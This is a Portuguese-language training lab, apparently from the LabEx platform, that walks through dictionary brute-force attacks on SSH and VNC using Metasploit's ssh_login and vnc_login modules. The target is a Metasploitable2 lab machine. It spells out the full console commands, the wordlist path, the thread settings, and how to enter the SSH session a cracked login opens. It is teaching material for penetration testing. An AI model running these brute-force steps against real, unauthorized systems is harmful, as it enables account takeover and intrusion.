Realizar Ataques de Força Bruta em SSH e VNC com Metasploit no Nmap

NmapBeginner
Pratique Agora

Introdução

Neste laboratório, você aprenderá como realizar ataques de força bruta contra serviços de autenticação com senhas fracas. Se um serviço de rede exige autorização para acesso, e o mecanismo de autorização se baseia em nomes de usuário e senhas, as vulnerabilidades de senhas fracas podem se tornar um alvo comum de ataque. Este tipo de vulnerabilidade é tipicamente causado por usuários que configuram senhas fracas, como "123456".

A abordagem mais direta para explorar senhas fracas é usar um ataque de força bruta baseado em dicionário. O arquivo de dicionário contendo potenciais nomes de usuário e senhas é crucial neste ataque. O atacante tenta conectar-se usando as combinações de nome de usuário e senha do dicionário até que uma conexão bem-sucedida seja estabelecida.

Neste laboratório, você utilizará o terminal do Metasploit Framework (MSF) no ambiente Kali Linux dentro da plataforma LabEx para realizar ataques de força bruta contra os serviços SSH e VNC na máquina alvo Metasploitable2.

Nota: As instâncias em nuvem usadas neste laboratório têm um número limitado de instâncias disponíveis devido a restrições de custo. Certifique-se de iniciar o ambiente do laboratório somente quando tiver tempo suficiente para concluir os exercícios, a fim de evitar o desperdício de instâncias.

Entenda o Ambiente

Nesta etapa, você aprenderá sobre o ambiente do laboratório e os pré-requisitos para realizar os ataques de força bruta.

O ambiente do laboratório consiste em dois componentes:

  1. Máquina de Ataque: Um contêiner Kali Linux que precisa ser iniciado usando o comando docker e acessado através do shell bash.
  2. Máquina Alvo: Uma máquina virtual Metasploitable2 com o nome de host target e o endereço IP 192.168.122.102. O nome de usuário e a senha padrão para esta máquina são msfadmin/msfadmin. Esta máquina precisa ser iniciada usando o sistema de gerenciamento de máquina virtual Libvirt.

Os ataques serão realizados a partir do ambiente Kali Linux usando o Metasploit Framework (MSF) contra a máquina alvo.

Para iniciar o ambiente do laboratório, siga estas etapas:

  1. Inicie um terminal XFCE na máquina host LabEx (desktop Ubuntu).

  2. Inicie a máquina alvo Metasploitable2 usando o seguinte comando:

sudo virsh start Metasploitable2

Aguarde o início da máquina alvo, pode levar de 1 a 3 minutos.

  1. Teste a conectividade com a máquina alvo usando o comando ping (você pode usar Ctrl+C para parar o ping):
ping 192.168.122.102
  1. Inicie o contêiner Kali Linux e entre no shell bash usando o seguinte comando:
docker run -ti --network host b5b709a49cd5 bash
  1. Teste a conectividade de rede do contêiner Kali para a máquina alvo usando o comando ping (você pode usar Ctrl+C para parar o ping):
ping 192.168.122.102

Agora, tanto a máquina de ataque (contêiner Kali) quanto a máquina alvo (Metasploitable2) estão em execução, e você pode prosseguir com os ataques de força bruta.

Nota: Se você sair acidentalmente do shell bash, o contêiner Kali será interrompido. Você pode reiniciar um novo contêiner Kali e entrar no shell bash novamente executando o comando docker run -ti --network host b5b709a49cd5 bash na máquina host LabEx.

Força Bruta em SSH

Nesta etapa, você aprenderá como realizar um ataque de força bruta contra o serviço SSH na máquina alvo Metasploitable2 usando o Metasploit Framework (MSF) no ambiente Kali Linux.

  1. No contêiner Kali Linux, inicie o console Metasploit:
cd ~
msfconsole
  1. Dentro do console Metasploit, use o módulo auxiliary/scanner/ssh/ssh_login para o ataque de força bruta SSH:
use auxiliary/scanner/ssh/ssh_login
  1. Configure as opções necessárias para o ataque:
  • Defina o host alvo:
set rhosts 192.168.122.102
  • Defina o arquivo de dicionário de senhas (você pode usar o arquivo /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt fornecido):
set userpass_file /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt
  • Defina a verbosidade como false para evitar saída excessiva:
set verbose false
  1. Revise as opções configuradas:
show options
  1. Inicie o ataque de força bruta:
exploit

O ataque começará, tentando fazer login no serviço SSH usando as combinações de nome de usuário e senha do arquivo de dicionário especificado. Uma vez que um login bem-sucedido seja encontrado, as credenciais correspondentes serão exibidas.

Nota: O processo de força bruta pode levar muito tempo. Você pode interromper o processo pressionando Ctrl+C após o primeiro login bem-sucedido ser exibido, se desejar.

  1. Após um login bem-sucedido ser encontrado, o script de ataque criará automaticamente uma sessão SSH. Você pode alternar para a sessão usando o comando sessions -i <session_id>, onde <session_id> é o ID da sessão exibido na saída.

  2. Dentro da sessão SSH, você pode executar vários comandos na máquina alvo.

Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção

Força Bruta em VNC

Nesta etapa, você aprenderá como realizar um ataque de força bruta contra o serviço VNC na máquina alvo Metasploitable2 usando o Metasploit Framework (MSF) no ambiente Kali Linux.

  1. Antes de mais nada, se você não estiver no console Metasploit, deverá iniciar o console Metasploit:
cd ~
msfconsole
  1. Dentro do console Metasploit, use o módulo auxiliary/scanner/vnc/vnc_login para o ataque de força bruta VNC:
use auxiliary/scanner/vnc/vnc_login
  1. Configure o número de threads para o ataque (mais threads tornarão o ataque mais rápido, mas também podem aumentar a chance de detecção):
set THREADS 5
  1. Defina o endereço IP do host alvo:
set RHOSTS 192.168.122.102
  1. Inicie o ataque de força bruta:
exploit
  1. Os resultados do ataque serão exibidos rapidamente, pois o login VNC não requer um nome de usuário e apenas tenta senhas fracas comuns.

Pressione Ctrl+D para sair do console Metasploit e, em seguida, iniciar a inspeção

Resumo

Neste laboratório, você aprendeu como realizar ataques de força bruta contra serviços de autenticação com senhas fracas usando o Metasploit Framework (MSF) no ambiente Kali Linux. Especificamente, você realizou ataques de força bruta contra os serviços SSH e VNC na máquina alvo Metasploitable2.

O laboratório abordou os seguintes conceitos-chave:

  • Compreensão do ambiente do laboratório e pré-requisitos
  • Configuração do Metasploit Framework para ataques de força bruta
  • Utilização de arquivos de dicionário de senhas para ataques de força bruta
  • Realização de ataques de força bruta contra o serviço SSH
  • Análise do script de ataque de força bruta SSH
  • Realização de ataques de força bruta contra o serviço VNC

Através desta experiência prática, você adquiriu conhecimento e habilidades práticas na condução de ataques de força bruta contra serviços de autenticação com senhas fracas, o que é um aspecto crucial de testes de penetração e hacking ético.